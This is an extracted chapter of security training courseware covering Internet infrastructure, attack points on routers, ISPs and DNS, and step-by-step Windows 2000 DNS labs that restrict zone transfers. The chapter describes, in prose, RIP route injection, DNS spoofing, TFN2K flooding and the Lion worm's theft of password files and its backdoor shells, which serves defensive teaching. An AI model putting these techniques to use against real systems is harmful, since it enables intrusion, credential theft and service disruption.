The Archive bit is the sixth bit in the attribute byte.

What is the essential difference between a differential backup and anincremental backup?

A differential backup does not mark the backed-up files as archived, whilethe incremental backup does.

420 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 474: SCNP Hardening

Security on the Internetand the WWW

OverviewIn this lesson, you will learn how to identify the issues associated withInternet and World Wide Web security. You will detail the major compo-nents of the Internet and their functions. Following a look at the componentsof the Internet, you will examine how hackers attack these components andhow they target Web sites. The lesson ends by detailing the areas of Internetsecurity that are related to individual users.

ObjectivesIn this lesson, you will:

7A Identify the major components of the Internet.

In this topic, you will identify the pieces of the Internet that are actuallyused to run the Internet and the organizations that govern them.

7B Examine the attacks used against Web servers.

In this topic, you will examine the techniques used in attacks on Webservers and Web sites.

7C Identify the attack points on the Internet.

In this topic, you will identify the areas of the Internet where attackshave the highest probability and what those attacks are likely to be.

7D Identify risks that the Internet user faces.

In this topic, you will identify the techniques used to attack the users ofthe Internet, in contrast to attacks against the Internet itself.

Data Filessimple.htm

Lesson Time4 hours

LESSON

7

Lesson 7: Security on the Internet and the WWW 421

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 475: SCNP Hardening

Topic 7ADescribing the Components of the InternetFor us to have a valid discussion about the Internet and the World Wide Web, itis critical that you have solid knowledge of the components of the Internet. Themajor components that we will discuss are the Backbone and NAPs (NetworkAccess Points), ISPs (Internet Service Providers), and DNS (Domain NameService).

The Backbone (or Layer 1 of the Internet)We know it as the Internet and the World Wide Web. The Internet is looselydefined by some as a packet-switched network of networks, not owned by anyone country, government, or organization; rather, it is a voluntary use network.The physical layer of the internet itself involves many types of physical media(wired and wireless), and therefore, many types of access methods.

The Internet Backbone itself is a very high-speed connection of networks and hasthree major components: Network Service Providers, Long Distance Carriers, andNetwork Access Points.

Two excellent Web sites that attempt to explain and illustrate the physical aspectsof the Internet, along with myriad other issues surrounding the Internet’s historyand future, are: www.cybergeography.com/ and www.telegeography.com/.

Figure 7-1: A graphical representation of the Backbone over the United States. Picture cour-tesy of the National Center for Supercomputing Applications (NCSA).

Components of the InternetBackbone

The U.S. Portion of theInternet Backbone

422 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 476: SCNP Hardening

Network Service Providers (NSPs)Network Service Providers, sometimes called peering centers, are the actual orga-nizations that provide the foundation level of the Internet Backbone. An NSP willprovide national or international interconnecting Internet services to RegionalNetwork Providers and to large Internet Service Providers, via Network AccessPoints. There are guidelines to be met for an organization to be considered anNSP, such as:

• Minimum DS-3 Bandwidth rates.

• Three interconnection points to NAPs.

• Routing of both ISO 8473 (CLNP) and IP packets.

• Service availability of 99.92 percent uptime, with further requirements of nomore than 7 hours per year outage and time to service restoration of 2.5hours.

Long Distance CarriersThe Long Distance Carriers are the providers of the physical network of commu-nication channels for the Internet and voice/data applications. The general methodwould be for a NAP to contract with a Long Distance Carrier to provide thechannels for backbone communication. Four major LDCs are listed below:

• ATT uses Frame Relay circuits at both DS-1 and DS-3 speeds, along with ahybrid Asynchronous Transfer Mode (ATM) network.

• Sprint provides DS-1 and DS-3 speeds on its primarily fiber network. Sprintalso uses FDDI for router interconnection.

• WorldCom International, a division of MCI WorldCom, uses a fiber and digi-tal microwave network to provide DS-1 and DS-3 speeds.

• Hughes Network Systems provides backbone bandwidth via satellitecommunication.

NAPsNAPs (Network Access Points) provide the actual means for the ISPs and NSPsto interconnect. The restrictions of traffic flow are only those that are the result ofrestrictions between the ISPs and NSPs (or legal requirements). ISPs and NSPsare required to have at least one bilateral agreement with a different ISP or NSPin order to attach to the NAP. In the United States, there are six major NAPs,known as Priority Network Access Points, and other non-priority NAPs:

• Sprint, located in Pennsauken, NJ.

• AmeriTech Advanced Data Services, located in Chicago, IL.

• MFS Communications, located in:

— Washington, DC

— San Jose, CA

— Dallas, TX

— Frankfurt, Germany

— Paris, France

• PacBell, located in:

Lesson 7: Security on the Internet and the WWW 423

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 477: SCNP Hardening

— Los Angeles, CA

— San Francisco, CA

• Federal Internet Exchange, known as FIX-West.

• Digital Internet Exchange, located in Palo Alto, CA.

ISPs at WorkWhen it comes to actual users connecting to the Internet, they need some type oflocal access. This is where the whole ISP (Internet Service Provider) systemcomes into focus. A common analogy for ISPs is that they are the providers ofthe “dial tone” for the Internet. With the ever-present mergers and acquisitions ofISPs, it is hard to keep up with all of the players. Instead, we will quickly look atthe ISP system.

Clearly, not every ISP can have a direct connection to the Backbone; there wouldbe too many connections, and the overall efficiency of the Internet would suffergreatly. Instead, there is a tiered system, where one ISP feeds off another. Thereare three levels of ISP generally classified as follows:

• Tier One: These ISPs have their own nationwide backbone and connect to aNAP. They also have over 1,000,000 subscribers.

• Tier Two: These ISPs obtain their bandwidth from Tier One and have a localor regional backbone network. They have 50,000 subscribers and providestate or national service.

• Tier Three: These ISPs obtain their bandwidth from Tier Two and wouldprovide local services only. They generally will have fewer than 50,000users.

Figure 7-2: A graphical representation of the ISP tier system and connections.

ISP Classifications

Just to be clear, there are noindustry-agreed-upon

guidelines on tierclassification; these are for

reference only.

ISP Tiers

424 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 478: SCNP Hardening

The Organizations that Help Run the Internet (or Layer8 of the Internet)For the Internet, there is no single management authority; instead, there are sev-eral groups involved in the infrastructure and management of the Internet. Theseorganizations work together to ensure that the Internet remains operational andfunctions at the highest levels of available efficiency.

The following are the main groups:

• Internet Engineering Task Force (IETF). The IETF is a large open interna-tional community of network designers, operators, vendors, and researchersconcerned with the evolution of the Internet architecture and the smoothoperation of the Internet. It is open to any interested individual.

• Internet Society (ISOC). The ISOC is a non-profit and nongovernmental pro-fessional organization that coordinates the usage of Internet applications andprotocols. Membership to the ISOC is required.

• Internet Architecture Board (IAB). The IAB is responsible for defining theoverall architecture of the Internet, providing guidance and broad direction tothe IETF. The IAB also serves as the technology advisory group to the ISOCand oversees a number of critical activities in support of the Internet.

• Internet Assigned Numbers Authority (IANA). The IANA, operating out ofthe University of Southern California, is chartered by the ISOC and the Fed-eral Networking Council to function as the central coordinator for theassignment of IP addresses and management of the Root Domain NameService.

• The Internet Corporation for Assigned Names and Numbers (ICANN). TheICANN, a non-profit corporation formed in 1998, presently assumes the fol-lowing responsibilities: the IP address space allocation, protocol parameterassignment, DNS and root server system management, as well as manage-ment functions previously performed under U.S. Government contract byIANA and other entities.

• Internet Engineering Steering Group (IESG). The IESG is responsible fortechnical management of IETF activities and the Internet standards process.The IESG is directly responsible for the actions associated with entry intoand movement along the Internet standards track, including final approval ofspecifications as Internet standards.

• Council of Registrars (CORE). The CORE provides the international frame-work in which the policies for administration and enhancement of theInternet Domain Name Service are developed and implemented.

• Network Information Centers (NIC). The NICs around the globe are organi-zations that perform Registry and Registrar functions associated withDomain Names.

The chart shown in Figure 7-3 will help you understand the position of these dif-ferent organizations according to the roles they play.

Organizations that Help Runthe Internet

The ICANN OrganizationalChart

Lesson 7: Security on the Internet and the WWW 425

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 479: SCNP Hardening

Figure 7-3: ICANN organizational chart.

DNS RevealedSimple connection via an ISP may be enough to use the Internet, but for mostusers, they also want to experience the World Wide Web. Because the Web usesnames, and the Internet uses numbers, there must be a translation between thetwo at some point along the way. This is where DNS comes in. Using flat-filedatabases maintained in Domain Name Servers around the world, users canbrowse around using names instead of numbers.

426 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 480: SCNP Hardening

The organization that keeps track of all of the names and numbers associatedwith DNS is IANA. IANA acts as the central coordinator for assignment of IPaddresses and manages the Root Domain Name Service. Additionally, there arethree regional organizations around the world that assign IP addresses:

• ARIN: The American Registry for Internet Numbers operates in the Ameri-cas and sub-Saharan Africa.

• RIPE: The Reseais IP Europeens operates in North Africa and Europe.

• APNIC: The Asia-Pacific Network Information Center operates in Asia andAustralia.

The DNS servers that provide the top level of name resolution are called the Rootservers. There are currently 13 Root level DNS servers. Their names, locations,and IP addresses are shown in Figure 7-4.

Figure 7-4: A table of the Root DNS servers on the Internet.

Figure 7-5 shows the physical locations of the Root DNS servers on the Internet.

Figure 7-5: A map showing the physical locations of the Root DNS servers. Image from theWorld Internetworking Alliance (WIA), www.wia.org.

DNS Root Servers

Mapping the DNS RootServers

Lesson 7: Security on the Internet and the WWW 427

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 481: SCNP Hardening

These Root servers are perhaps the most important systems today on the Internet.Root Servers A through M are maintained under control of the U.S. government.To prevent a single hacker exploit from compromising the entire system, the Rootservers run different variations of UNIX as their operating systems. So critical isproper DNS operation to the global economy that most of these locations aresecured under strict access methods, coupled with military-level control andarmed guards present at all times. Recent attacks (as the one in October 2002) viathe Internet to try and cripple these servers failed to have a significant impact onthe Internet because of the built-in redundancy. To increase fault tolerance, dis-cussions are under way to populate the Internet with a few more Root servers,hosted in the Asia-Pacific region. To begin the process, Root Server F in Califor-nia will be mirrored to a location in Asia so as to reach the largest possibleInternet base of users.

TASK 7A-1Defining Internet Components

1. Discuss, with at least one other student, the principles of the Internetdesign.

2. After your discussion, diagram as much of the physical layout of theInternet as possible. Make your diagram as detailed as possible, includingas many components as you can think of, only using this text for referencewhen necessary.

Topic 7BIdentifying the Weak Points of the InternetSo if the Internet servers are so well secured, and the ISP/NAP combinationshave at least three connection points, the redundancy of the Internet seems to, bydesign, make hacking it a difficult task. To some this may be true, but to others itpresents a challenge. So, where would a hacker attack? At what point is theInternet itself vulnerable? Hackers have several options, none of which are aseasy as targeting a neighbor or small business down the street. Options of attackbecome the infrastructure itself, instead of a particular host or network.

Imagine this: There is a person who is trying to damage business X, a retailbusiness. Business X has solid physical security inside, and people shop there nomatter how loudly this person yells at them to stop. Out of frustration, one dayhe goes into the revolving door of business X and jams it so that it cannotrevolve. He does this to all three revolving doors until there is no way in or outof business X. Did he compromise any internal systems, or even attempt to breakinto them? Not one. Has he damaged the business? Absolutely.

This is similar to the difficult issue of securing the infrastructure of the Internet.There are so many revolving doors, so to speak, that can become broken. It maynot be necessary to actually “get inside” to be able to damage a mission-criticalsystem.

fault tolerance:The ability of a system or

component to continuenormal operation despite the

presence of hardware orsoftware faults.

hacking:Unauthorized use, or

attempts to circumvent orbypass the securitymechanisms of an

information system ornetwork.

428 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 482: SCNP Hardening

Targeting the RoutersOne of the potential targets of the Internet is the physical routers. These are thedevices that carry the network information on the Backbone of the Internet. TheBackbone routers function in a slightly different way from the everyday routersused in most organizations. The Backbone routers can be considered defaultlesscore routers, due to the fact that they do not hold any default routing data.Instead, Backbone routers use BGP (Border Gateway Protocol) to learn newroutes dynamically. If an owner of an IP address changes local ISPs, the routes tothis owner change. Most Backbone routers will accept BGP messages only fromthe largest Tier One ISPs. In the event that a Backbone router is found that willaccept BGP information, this is where a hacker will attempt to inject false routingdata into the tables.

If the hacker is unable to inject false routing data, he or she may result to DoS(Denial of Service) for the simple task of preventing the router from operatingfully as designed.

An easier place for router attacks is not on the Internet itself, but in the local net-work routers. If a router is using RIP (Routing Information Protocol), a hackercan inject data into the routing tables with ease. RIP uses UDP packets forexchange of data and does not have any authentication mechanism built in. Thismeans that any attacker can inject false routes into the routing tables. The falseroutes will then be propagated around the RIP network.

Figure 7-6: An example of some of the locations from which a hacker can inject RIPupdates into a network.

Vulnerable Locations forRIP Injections

Lesson 7: Security on the Internet and the WWW 429

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 483: SCNP Hardening

Targeting the ISPsThe way for a hacker to reach the maximum number of potential targets in thefastest amount of time is to hack into an ISP. By compromising an ISP, a hackercan have access to thousands of targets almost at once. This potential is over-whelming for some hackers, thus the ISP is their primary target. Often the hackerwill not be trying to actually do any damage to the ISP itself, and he will try toremain as unnoticed as possible. The hacker is interested only in the user data.User names, passwords, and IP addresses can be compromised.

Targeting DNSThis is perhaps the biggest risk area of the Internet. Not technically a single pointof failure, since the Root DNS servers run different versions of their operatingsystems on various hardware platforms in various physical locations, but never-theless a strong target. There have been many issues of vulnerabilities with DNSover the years, with one of the most current being the BIND (Berkley InternetName Domain) attacks starting March 22, 2001.

The Lion WormOn that day in March, IDS sensors all over the world were picking up massiverequests to port 53 (DNS). A worm was soon found, named Lion, which used theBIND hole to attack the DNS servers. One single regional analysis of port 53probes saw the number jump from 200 probes per day, prior to March 22, up to50,000 probes on that day.

The Lion worm is very similar to a different worm named Ramen; however, Lionwas much more dangerous and needed to be taken seriously. It infected Linuxmachines with the BIND DNS server running. The BIND versions that wereaffected were 8.2, 8.2-P1, 8.2.1, and 8.2.2-Px, but BIND 8.2.3-REL and BIND 9were not vulnerable.

The Lion worm was distributed via an application called pscan. randb would fol-low by generating random class B networks, probing TCP port 53. After a systemwas targeted, it would next check to see if that system was vulnerable. In theevent that a vulnerable system was identified, a system exploit was executed, andthe t0rn rootkit was installed.

Once the rootkit was installed, it sent off the contents of /etc/passwd and /etc/shadow, along with some network settings, to an address in the china.comdomain. It would then delete /etc/hosts.deny, lowering some of the built-in protec-tion afforded by TCP wrappers. Ports 60008/tcp and 33567/tcp were given abackdoor root shell (via inetd, see /etc/inetd.conf), and a Trojaned version of SSHwould be placed on 33568/tcp. Syslogd would then be killed, so the logging onthe system could no longer be considered trusted.

To continue, a Trojaned version of login would then be installed. The Trojanwould enable looking for a hashed password in /etc/ttyhash. /usr/sbin/nscd (theoptional Name Service Caching daemon) would finally be overwritten with aTrojaned version of SSH.

So, does this strike you as a serious threat? It better! All of this would be pos-sible, simply by locating DNS servers running the correct versions of BIND. Thisis an example of attacking the infrastructure directly.

probe:Any effort to gather

information about a machineor its users for the apparent

purpose of gainingunauthorized access to the

system at a later date.

rootkit:A hacker security tool that

captures passwords andmessage traffic to and from a

computer. A collection oftools that allows a hacker to

provide a back door into asystem, collect information

on other systems on thenetwork, mask the fact that

the system is compromised,and much more. Rootkit is a

classic example of TrojanHorse software. Rootkit is

available for a wide range ofoperating systems.

430 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 484: SCNP Hardening

DDoS of the InternetInstead of launching a specific attack against the DNS system, a hacker can targetDNS via a DDoS (Distributed Denial of Service). By launching a DDoS attackagainst DNS servers, no true data can be exchanged. The end result of this is thatDNS servers will not be able to update their DNS entries, and host-name resolu-tion may cease for those server’s clients.

DDoS takes advantage of the inherent communication channels of the Internet. Inorder for us to communicate, we must have open channels. If those channels wereto fill with useless information, then when we need to communicate, there wouldbe no open channels to do so. This is essentially the function of DDoS.

One of the main tools used in DDoS attacks is called TFN2K, or Tribe FloodNetwork 2000. TFN2K has the ability to flood the network with TCP, UDP, orICMP packets (or a mix of all three at the same time). Additionally, TFN2K canspoof the source IP address, making for difficult investigative work in response toan attack.

If a hacker is going to go after the serious infrastructure of the Internet, there isno better choice than DNS itself.

Figure 7-7: A graphical example of the position of elements for a simple DoS attack.

Denial of Service AttackLocations

Lesson 7: Security on the Internet and the WWW 431

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 485: SCNP Hardening

TASK 7B-1Identifying Weak Points of the Internet

1. Using your diagram from Task 7A-1 for reference, identify the points ofattack of the Internet, and the methodologies that could be used toattack these points.

2. List the possible attack points and methods you have defined.

DNS SecurityBecause the DNS servers are perhaps the most critical component of the Internet,their security is paramount. There are several different areas in which attackerscommonly will go after a DNS server. They are pulling Zone Transfer traffic andDNS Spoofing.

Zone TransfersWhen it comes to DNS and security on the Internet, one of the first issues toaddress is the issue of Zone Transfer traffic. Zone Transfer traffıc is the name ofthe data sent from a DNS server that is responsible for an area, or zone, to a sec-ondary server that will assist with name resolution.

The reason this is critical, from a security perspective, is that in this transfer traf-fic are names of computers and their IP addresses. Additionally, depending on theconfiguration of the master DNS server, the data is likely to include the type ofmachine, such as a mail server. So, if an attacker is trying to identify the targetsin a particular network, the zone transfer traffic may identify all the machines.

Where this is most important is the DNS server that provides name resolution toboth public and private addresses. In the event an attacker is able to get the zonetransfer traffic of this DNS server, the attacker will have the entire internal net-work mapped, by hostname, IP address, and some services.

There are two basic types of Zone Transfer traffic. The first is called All-zone,and this transfer is when all the names that the master DNS server is aware of aresent to the secondary DNS server—in other words, everything the DNS serverknows about name resolution. In the DNS server, this is called an AXFR transfer.

The second type of transfer is called an Incremental transfer. The Incrementaltransfer, instead of containing all that a DNS server knows, will contain only thatinformation that is new or changed since the last transfer. This is a more efficientway of exchanging zone data. In the DNS server, this is called an IXFR transfer.

So an attacker may pretend to be a legitimate secondary DNS server and requestthe master DNS to transfer the zone information. For this reason, it is stronglyadvised that all master DNS servers are configured to allow transfer traffic to goonly to authorized secondary DNS servers.

432 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 486: SCNP Hardening

DNS SpoofingCompanies that do all of their business on the Internet must be vigilant in theprotection of their Web sites. However, for most organizations, the ability to pro-tect the Web site stops at the Web site. Generally, the organization does not havecontrol over the ISP, the routers, or the DNS of the Internet. What would happenif the DNS server that is used to identify the organizational Web site were to sud-denly point to the wrong Web site?

This type of thing has happened, and it is something that an organization mustwatch out for. The ability to redirect a DNS server to point a client to an incor-rect resource is very serious. Imagine that an attacker had taken the time to pullevery page from the organization’s Web site, could re-create the site in itsentirety, and was to redirect legitimate requests for this Web site to the clonedsite that the attacker is running. If this Web site takes credit card numbers, itbecomes a very serious situation.

There are several different methods of DNS spoofing:

• DNS Cache Poisoning. In DNS Cache Poisoning, an attacker sends fakemapping information to the DNS server, and the server enters this falsename information as legitimate DNS data. When a client asks the DNSserver to resolve a name that has been falsely entered in the DNS server,there is no way for the client to know that the information is incorrect. Bydoing this, the attacker is able to send the client to an incorrect machine.

• Spoofing the DNS Response. In Spoofing the DNS Response, the attackersits between the DNS client and the legitimate DNS server. When theattacker notices a DNS request on the wire, a false response is sent to theclient (from the attacker) before the legitimate DNS server can reply. Bydoing this, the attacker is sending the client to an incorrect machine.

• DNS Server Compromise. The third spoofing option is for complete DNSServer Compromise. In this case, the attacker has taken control of a legiti-mate DNS server and has directly inputted false data. The client makes aDNS request to the server, and the server replies just as it is designed to do.

The danger of a DNS server that has been compromised, combined with a dupli-cated Web site that requests credit card data, should be very obvious by now. Onething to maintain, as an organization, is careful logging and monitoring of Webtraffic. In the event that all traffic stops, this may be cause for alarm.

Configuring DNS for Windows 2000In the following set of tasks, you will install and configure DNS servers. First,your instructor will configure a DNS server on the instructor machine. This willbe the Standard Primary Server. Watch the steps carefully as the instructor per-forms them. Next, the instructor will create Reverse Lookup Zones for the Left,Center, and Right subnets, matching the subnets in your classroom layout. Yourinstructor will also create one Forward Lookup Zone called scnpdns.edu for thewhole class. You will later configure your machines to be Secondary DNS Serv-ers to this Primary Server.

DNS spoofing:Assuming the DNS name ofanother system by eithercorrupting the name servicecache of a victim system, orby compromising a domainname server for a validdomain.

Lesson 7: Security on the Internet and the WWW 433

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 487: SCNP Hardening

INSTRUCTOR TASK 7B-2Installing a Standard Primary DNS Server on a Windows2000 Server

Setup: Your instructor will perform this task on the instructormachine.

1. If necessary, log on to Windows 2000 Server as Administrator.

2. Configure the nameserver lookup for the network interface 172.17.10.1to be 172.17.10.1.

To do this, right-click My Network Places, and choose Properties. Right-click the Ethernet interface for 172.17.10.1, and choose Properties.Double-click Internet Protocol (TCP/IP). Select Use The Following DNSServer Addresses, and enter 172.17.10.1. Then click OK twice.

3. From the Network And Dial-up Connections Control Panel menu, chooseAdvanced→Optional Networking Components.

4. In the Components window, highlight, but do not check, Networking Ser-vices and click the Details button.

5. Check DNS and click OK.

6. Click Next, point to the location of your Windows 2000 Server’s i386installation files, click Open, and click OK. You now have the DNS serverinstalled on your machine.

Reverse Lookup ZonesNow your instructor will create Reverse Lookup Zones for the Left, Center, andRight to match the subnets, just the way your class is laid out. Your instructorwill also configure Zone Transfer properties for selective transfers.

There is no particular reason for creating Reverse Lookup Zone(s) first and thenthe Forward Lookup Zone(s). It’s just that, by creating a Reverse Lookup Zonefirst, you are indicating an awareness of the various subnets that make up yournetwork. This will lead to a more streamlined approach if you create host recordsvia dynamic DNS (DDNS)—their associated reverse lookup records will be auto-matically created and placed in their appropriate zones. Even when you aremanually creating host records, if you check the option to simultaneously create areverse lookup record, the reverse lookup record will automatically be placed inthe appropriate zone.

434 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 488: SCNP Hardening

INSTRUCTOR TASK 7B-3Creating Reverse Lookup Zones

Setup: Your instructor will perform this task on the instructormachine.

1. From the Start menu, choose Programs→Administrative Tools→DNS.

2. Expand INS-W2K-C01, select and right-click Reverse Lookup Zones,and choose New Zone.

3. Click Next, verify that Standard Primary is selected, and click Next.

4. For Network ID, enter 172.16.10.

5. Click Next twice, then click Finish.

6. Create Reverse Lookup Zones for the 172.17.10 and 172.18.10 zones. Usethe steps above as a guide.

7. Expand the Reverse Lookup Zones folder. Select and right-click theReverse Lookup Zone 172.16.10.x Subnet, and choose Properties.

8. Select the Zone Transfers tab, leave Allow Zone Transfers checked, butselect the radio button next to Only To The Following Servers, and addthe IP addresses for all student machines that are on the 172.16.10.xsubnet.

9. Click OK.

10. Select and right-click the Reverse Lookup Zone 172.17.10.x Subnet, andchoose Properties.

11. Select the Zone Transfers tab, uncheck Allow Zone Transfers. Click OK.

12. Select and right-click the Reverse Lookup Zone 172.18.10.x, and chooseProperties.

13. Select the Zone Transfers tab, leave Allow Zone Transfers checked, butselect the radio button next to Only To The Following Servers, and addthe IP addresses for all student machines that are on the 172.18.10.xsubnet.

14. Click OK.

Forward Lookup ZonesNow, your instructor will create a Forward Lookup Zone for the whole class.Your instructor will also configure Zone Transfer properties for selected transfers.

Lesson 7: Security on the Internet and the WWW 435

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 489: SCNP Hardening

INSTRUCTOR TASK 7B-4Creating a Forward Lookup Zone

Setup: Your instructor will perform this task on the instructormachine.

1. Select and right-click Forward Lookup Zones, and choose New Zone.

2. Click Next, verify that Standard Primary is selected, and click Next.

3. For Zone Name, enter scnpdns.edu.

4. Click Next twice, and then click Finish.

5. Expand Forward Lookup Zones, then select and right-click scnpdns.edu,and choose Properties.

6. Select the Zone Transfers tab, leave Allow Zone Transfers checked, butselect the radio button next to Only To The Following Servers, and enterthe IP addresses for all student machines that are on the 172.16.10.x and172.18.10.x subnets.

7. Click OK.

8. If necessary, select the Zone you just created.

9. Right-click anywhere in the right pane, and choose New Host.

10. For the Host Name, enter STU-W2K-L01.

11. Enter the IP address for the host name, such as 172.16.10.1, and createthe associated PTR record.

12. Click Add Host, click OK, then click Done.

13. Create a host record for every student machine in the classroom. Use thesteps above as a guide.

14. Right-click each of the three Reverse Lookup Zones, and chooseRefresh.

15. Right-click each of the three Reverse Lookup Zones, and choose UpdateServer Data File.

16. Right-click the Forward Lookup Zone scnpdns.edu, and choose Refresh.

17. Right-click the Forward Lookup Zone scnpdns.edu, and choose UpdateServer Data File.

Installing DNSNow that a Standard Primary Server has been set up, you and the other studentswill install a DNS server on each of your machines. These are the servers thatwill later be configured as Standard Secondary Servers.

436 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 490: SCNP Hardening

TASK 7B-5Installing DNS Servers

Setup: Perform this task on all student machines.

1. If necessary, log on to Windows 2000 Server as the renamed Administra-tor account.

2. Open a command prompt and enter the ipconfig /all command.

3. Verify that you do not have a configuration for DNS server lookup.

4. Keep the command prompt open.

5. From your desktop, right-click My Network Places, and chooseProperties.

6. Double-click the Classroom Hub interface.

7. Click Properties, double-click TCP/IP, specify your IP address in thefield for Use The Following DNS Server Addresses, and click OK twice.

8. Switch back to the command prompt and reenter the ipconfig /allcommand.

9. Verify that you now have a configuration for DNS server lookup.

10. From the Network And Dial-up Connections Control Panel menu,choose Advanced→Optional Networking Components.

11. In the Components window, highlight, but do not check, Networking Ser-vices, and click the Details button.

12. Check DNS, and click OK.

13. Click Next, point to the location of your Windows i386 installation files,click Open, and click OK. You now have a DNS server installed on yourmachine.

Zone ConfigurationNow that your DNS server has been set up, you will practice installing a Stan-dard Primary Server of your own. You will verify the configuration filesassociated with your DNS server. You will then remove this zone from your DNSserver.

Lesson 7: Security on the Internet and the WWW 437

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 491: SCNP Hardening

TASK 7B-6Creating, Viewing, and Deleting Forward and ReverseLookup Zones

1. From the Start menu, choose Programs→Administrative Tools→DNS.

2. Click the + sign next to your computer name to expand it. You should seetwo folders, one called Forward Lookup Zones and the other ReverseLookup Zones. You can right-click either of these to add zones. First, wewill add a Forward Lookup Zone.

3. Select and right-click Forward Lookup Zones, and choose New Zone.

4. Click Next, verify that Standard Primary is selected, and click Next.

5. For Domain Name, enter studentxxx.edu, where xxx are the last three char-acters of your computer name. If your computer name is stu-w2k-r03 thenyou should create the Forward Lookup Zone studentr03.edu.

6. Click Next twice, and then click Finish.

7. Expand Forward Lookup Zones, and click the zone that you justcreated.

8. Observe the SOA (Start of Authority) and NS (nameserver) records withyour server’s IP address.

9. Right-click anywhere in the right pane, and choose New Host.

10. In the New Host dialog box, enter testhost for the hostname.

11. Enter an IP address, such as 192.168.10.101.

12. Click Add Host, click OK, and then click Done.

13. Right-click anywhere in the right pane, and choose Update Server DataFile.

14. Open Explorer, and navigate to your \WINNT\System32\dns folder.

15. Right-click studentxxx.edu.dns, and choose Open With.

16. Select Notepad, uncheck Always Use This Program To Open These Files,and click OK.

17. Observe that an A record for testhost has been created. You can also seethe text format of the SOA and NS records.

18. Switch back to the DNS console.

19. Right-click the zone you just created, and choose Delete. Click OK toconfirm the deletion of the zone.

438 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 492: SCNP Hardening

Standard Secondary DNS ServersYou will now configure your server to be a Standard Secondary Server. You willalso verify that your Secondary Server will be able to receive the zone databaseinformation that it is entitled to.

TASK 7B-7Creating Secondary Zones

Setup: To create a secondary zone, you first need a primary zone tobe up and running. Your instructor’s machine is configuredwith the primary zone scnpdns.edu, so we can proceed.

1. Select and right-click Forward Lookup Zones, and choose New Zone.

2. Click Next, select Standard Secondary, and click Next.

3. For Zone Name, type scnpdns.edu. In an AD environment, you can browsefor zones.

4. Click Next.

5. For the IP address of the instructor machine running the DNS server, enter172.17.10.1.

6. Click Add, click Next, and then click Finish.

7. Click the zone that you just created.

8. If you see a red X and a message that states Zone Not Loaded By DNSServer, right-click the zone, and choose Transfer From Master. Then,refresh the DNS console until the zone information is displayed. Thezone database should transfer to your DNS server from the instructor’smachine.

9. Right-click in the right pane.

10. Observe that, because this zone is a secondary zone, no records can beadded or modified. You can only do two things: refresh the list or transferthe list from the primary server.

11. Select and right-click Reverse Lookup Zones, and choose New Zone.

12. Click Next, select Standard Secondary, and click Next.

13. If your IP address is 172.16.10.x, enter 172.16.10 for the Network ID.

If your IP address is 172.18.10.x, enter 172.18.10 for the Network ID.

14. Click Next.

15. For the IP address of the instructor machine, enter 172.17.10.1.

16. Click Add, click Next, and click Finish.

Lesson 7: Security on the Internet and the WWW 439

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 493: SCNP Hardening

17. Expand Reverse Lookup Zones, and click the zone that you just created.

18. If the zone was not loaded by the DNS server, right-click the zone, andchoose Transfer From Master. The zone database should transfer to yourDNS server from the instructor’s machine.

19. Right-click in the right pane.

20. Observe that, again, because this zone is a secondary zone, no recordscan be added or modified. You can only do two things: refresh the list ortransfer the list from the primary server.

Zone TransfersYou will now verify that your Secondary Server will not be able to receive zonedatabase information that it is not entitled to.

TASK 7B-8Attempting Blocked Zone Transfers

1. Select and right-click Reverse Lookup Zones, and choose New Zone.

2. Click Next, select Standard Secondary, and click Next.

3. If your IP address is 172.16.10.x, enter 172.18.10 for the Network ID.

If your IP address is 172.18.10.x, enter 172.16.10 for the Network ID.

4. Click Next.

5. For the IP address of the instructor machine, enter 172.17.10.1.

6. Click Add, click Next, and click Finish.

7. In the left pane, click the zone that you just created.

8. Verify that you see a red X and the message Zone Not Loaded by DNSServer. Right-click the zone, and choose Transfer From Master. Thistime, the zone database should not transfer to your DNS server from theinstructor’s machine.

This is because the Primary Server has configured that only certain second-ary servers will be allowed to transfer zone database information, and yourserver is not on that list.

9. Right-click Reverse Lookup Zone, and choose New Zone.

10. Click Next, select Standard Secondary, and click Next.

11. For the Network ID, enter 172.17.10.

12. Click Next.

440 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 494: SCNP Hardening

13. For the IP address of the instructor machine, enter 172.17.10.1.

14. Click Add, click Next, and click Finish.

15. In the left pane, click the zone that you just created.

16. Verify that you see a red X and the message Zone Not Loaded by DNSServer. Right-click the zone, and choose Transfer From Master. Thistime, the zone database should not transfer to your DNS server from theinstructor’s machine.

This is because the Primary Server has configured that no servers will beallowed to transfer zone database information.

17. Close all open windows.

Topic 7CDescribing Web Hacking TechniquesInstead of taking the time to manually look for holes, hackers will use toolsdesigned to search for specific exploit opportunities. These tools will scan a site,looking for the exact type of vulnerability that the hacker seeks.

